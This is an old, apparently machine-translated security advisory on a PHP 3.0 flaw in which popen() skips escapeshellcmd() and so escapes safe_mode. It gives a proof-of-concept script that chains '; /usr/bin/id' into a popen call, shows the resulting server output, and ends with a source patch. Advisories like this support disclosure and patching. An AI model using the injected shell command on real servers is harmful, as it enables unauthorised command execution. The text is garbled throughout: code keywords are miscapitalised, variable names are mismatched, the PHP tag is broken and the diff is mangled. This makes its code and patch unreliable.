_php Foundation of PHP3 safe_mode Failure vulnerability

Affected Systems: PHP 3.00
--------------------------------------------------------------------------------
Describe:

PHP Version 3.0 is an HTML embedded scripting language. Most of its syntax is ported to C, Java, and Perl and combines
PHP features. This language allows Web developers to quickly create dynamic Web pages.

PHP has built-in security features called ' Safe_mode ' because it executes on a Web server and allows the user to execute code.
Used to control the execution of commands in a Webroot environment that allows PHP operations.

The implementation mechanism is to route the shell command to the Escapeshellcmd () by forcing a system call to execute the shell command.
function, which is used to confirm that commands cannot be executed outside the Webroot directory.

In some versions of PHP, the Escapeshellcmd () is invalidated when using the Popen () command, causing a malicious user to
To use the ' Popen ' system call for illegal operation.

--------------------------------------------------------------------------------
Test program:

Warning: The following procedures (methods) may be offensive for security research and teaching purposes only. Users are at risk!

<?php
$fp = Popen ("Ls-l/opt/bin; /usr/bin/id "," R ");
echo "$FP <br> N";
while ($line = fgets ($fp, 1024)):
printf ("%s <br> N", $line);
Endwhile;
Pclose ($FP);
Phpinfo ();
? >

The output results are as follows:

1
Total 53
-rwxr-xr-x 1 root root 52292 3 22:05 ls
Uid=30 (Wwwrun) gid=65534 (nogroup) groups=65534 (Nogroup)
And from the configuration values of Phpinfo ():
Safe_mode 0 1

--------------------------------------------------------------------------------
Suggestions:
Index:functions/file.c
===================================================================
RCS File:/repository/php3/functions/file.c,v
Retrieving revision 1.229
Retrieving revision 1.230
Diff-u-r1.229-r1.230
---functions/file.c 2000/01/01 04:31:15 1.229
+++ functions/file.c 2000/01/03 21:31:31 1.230
@@ -26,7 +26,7 @@
| Authors:rasmus Lerdorf <rasmus@lerdorf.on.ca> |
+----------------------------------------------------------------------+
*/
-/* $Id: file.c,v 1.229 2000/01/01 04:31:15 SAS EXP $ * *
+/* $Id: file.c,v 1.230 2000/01/03 21:31:31 KK EXP $ * *
#include "Php.h"
#include <stdio.h>
@@ -51,6 +51,7 @@
#include "safe_mode.h"
#include "Php3_list.h"
#include "Php3_string.h"
+ #include "exec.h"
#include "file.h"
#if Have_pwd_h
#if MSVC5

@@ -575,7 +576,7 @@
PVal *arg1, *arg2;
FILE *FP;
int id;
-Char *p;
+ Char *p, *tmp = NULL;
Char *b, buf[1024];
Tls_vars;

@@ -600,7 +601,11 @@
} else {
snprintf (Buf,sizeof (BUF), "%s/%s", php3_ini.safe_mode_exec_dir,arg1->value.str.val);
}

-fp = Popen (buf,p);

+
+ tmp = _php3_escapeshellcmd (BUF);
+ fp = popen (tmp,p);
+ Efree (TMP); /* Temporary copy, no longer necessary * *
+
if (!FP) {
Php3_error (e_warning, "Popen" ("%s", "%s")-%s ", Buf,p,strerror (errno));
Return_false;